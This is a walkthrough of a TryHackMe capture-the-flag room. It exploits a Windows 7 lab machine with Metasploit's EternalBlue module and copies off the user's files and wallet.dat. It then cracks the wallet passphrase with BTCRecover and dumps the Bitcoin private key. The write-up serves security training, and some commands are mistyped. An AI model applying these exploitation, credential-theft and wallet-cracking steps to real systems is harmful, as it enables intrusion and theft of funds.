TryHackMe Walkthrough — Bitcoin Impossible
Bitcoin Impossible: https://tryhackme.com/r/room/bitcoinimposible
This is a walkthrough for the TryHackMe room Bitcoin Impossible. The main learning points in this room are interacting with Bitcoin wallets/keys and understanding permutation patterns for password cracking. There are many ways to solve this but, everything done to solve it in this writeup was completed on the TryHackMe attack box. No external computing power to crack anything.
In this scenario, you are a hacker tasked by the Government with stopping a devious plot. Hans Gruber, the infamous evil mastermind, plans to crash a Christmas party at Nakatomi Tower. Intelligence has revealed that he’s funding his scheme with Bitcoin. Your mission is to hack into Gruber’s computer and steal the Bitcoin to thwart his plan before it unfolds.
We are provided an ip address from the intercepted communications.
We’ll start by opening terminal and running some recon on the provided IP.
nmap -A <ip-address>
The -A flag is an aggressive scan, providing OS, versions, and a ton of other information. Yea, -A is loud and proud, but YOLO my dude.
The target seems to be rocking Windows 7 Build (7601). That’s a blast from the past.
Some ports worth noting:
- 3389: Remote Desktop Protocol (RDP), your usual suspect.
- 8883: Could be a hint that Bitcoin Core software is in play.
Ah, Mr. Gruber, the proud new owner of a bargain-bin OS picked up from the wilds of the internet. Because nothing says ‘top-notch security’ like ‘free and sketchy.’ Bravo.
There are other open ports that might hold some vulnerabilities, but let’s skip the formalities and go straight for the ace with EternalBlue. Classic, reliable, and just begging to be exploited.
Let’s spin-up Metasploit and get that going to gain access to his computer. In the terminal we’ll enter:
msfconsole
search eternalblue
use 1
set RHOST <ip-address>
exploit
Once we have a shell we can manually explore the machine using:
pwd = Displays current directory
cd <path> = changes directory location
cd .. = up one directory
dir = displays contents in current directory
Poking around on the machine we’ll find all the goods on Gruber’s desktop.
cd C:\Users\Hans Gruber\Desktop
We can dump all the contents to our attack box’s Downloads folder for closer review.
download “C:\Users\Hans Gruber\Desktop” /root/Downloads
The files retrieved are… interesting, to say the least.
First up, we’ve got a .pdf of the Bitcoin whitepaper — looks like Mr. Gruber was brushing up on his crypto knowledge. How quaint.
Then there’s a photo of John McClane. It seems Gruber has some unresolved feelings there — Hate? Obsession? A little of both, perhaps.
Finally, our tour de force a .txt file named pw.txt. It’s basically Gruber’s personal treasure map of accounts and passwords, including the credentials for his Windows login.
Shall we use the RDP application Remmina and pay a little visit to his workstation? Let’s.
Open terminal on the attack box and type
remmina
Start a new RDP connection selecting the plus box in the top left corner of the application.
Enter Gruber’s IP address into the server field, input the Windows username and password, and hit Connect. Simple enough, let’s see what surprises await us!
Select “yes” on the popup to accept the certificates.
As soon as the Windows machine logs in, the Bitcoin Core application conveniently pops up.
Navigating to the “Receive” section reveals a wallet labeled: “Wallet Address for Evil Plan.” Subtle, Gruber.
Opening the wallet displays the address: BC1QYG3H6P0GVHFL205UDJJPUF777A97PC2SFVASUR — a perfect match to the address from the intercepted communications. The wallet appears empty on his machine, but the blockchain hasn’t fully synced, so verifying the address in an online block explorer reveals we’ve found the pot of Bitcoin fueling his nefarious scheme! (Note: The actually Bitcoin has moved as the challenge has previously been solved.)
Let’s dump that private key and save Christmas!
In the Bitcoin Core application navigate to “Window” and then select “Console”.
dumppivkey BC1QYG3H6P0GVHFL205UDJJPUF777A97PC2SFVASUR
and press enter.
We get an error because the wallet is password protected.
We’ll need to pull the wallet.dat file over to our attack box to attempt to crack the passphrase.
Bitcoin Core stores the wallet.dat file in the same location in a typical install. Let’s hop back over to our meteterperter session and download the wallet.dat file to our local machine.
Navigate to the wallet file in Metasploit
cd “c:\Users\Hans Gruber\appdata\Roaming\Bitcoin\Wallets”
dir
We can see the Evil Plan wallet listed. Let’s open it up.
cd “evil plan”
dir
We can now see the wallet.dat file listed in the directory.
To pull it over to the attack box enter:
download wallet.dat /root/Downloads
We’ve got our hands on the wallet.dat file, but there’s still the pesky passphrase to crack. A quick look at Gruber’s pw.txt file doesn’t give us the exact passphrase — because of course, he couldn’t make it that easy. There are some similar passwords listed, but brute-forcing it with that information could take days or even weeks, and we’re on a tighter schedule than that!
After staring at the passwords for a while, a pattern emerges: every single one is some permutation of !!, 88, McClaneSUX, and Hansisboss. Bingo. This revelation drops our possible combinations from millions down to just 64 possibilities. Now we’re in business!
There’s more than one way to crack an egg or in this case a bitcoin wallet. We’re going to use a tool called BTCRecover. First we’ll need to download it on our attack box to assist in the cracking.
Then navigate into the created folder.
cd BTCRecover
We need to create a token list containing the permutations we discovered previously.
nano pwlist.txt
In the document enter:
!!
88
McClaneSUX
Hansisboss
Save the file and let’s fire up BTCRecover!
Each line represents a unique token that will be combined with the others in every possible order to generate all permutations. Using BTCRecover, we will explore all potential combinations, including any 1, 2, or 3 tokens, or all 4 tokens together. This process will result in a total of 64 possible combinations.
We’ll start the program and set the wallet flag to point to the location of the wallet.dat file. Then, use the token list flag to reference the list of possible passphrase combinations we just created. Let’s see if we can crack this thing wide open!
python3 btcrecover.py — wallet ‘/root/Downloads/wallet.dat’ — tokenlist pwlist.txt
And just like that — boom! We’ve got it in no time at all.
Password found: ‘88McClaneSUX!!’
To skip the hassle of downloading Bitcoin Core and importing the wallet locally, let’s head back to the Remmina instance. Open Bitcoin Core on Gruber’s machine, navigate to the console, and take control directly from there.
Now we’ll enter:
walletpassphrase 88McClaneSUX!! 600
This will unlock the wallet for 600 seconds aka 10 minutes
Then we’ll type:
dumpprivkey BC1QYG3H6P0GVHFL205UDJJPUF777A97PC2SFVASUR
Success! The private key to the Bitcoin address is revealed — and as a bonus, it doubles as the flag for the challenge. Mission accomplished!
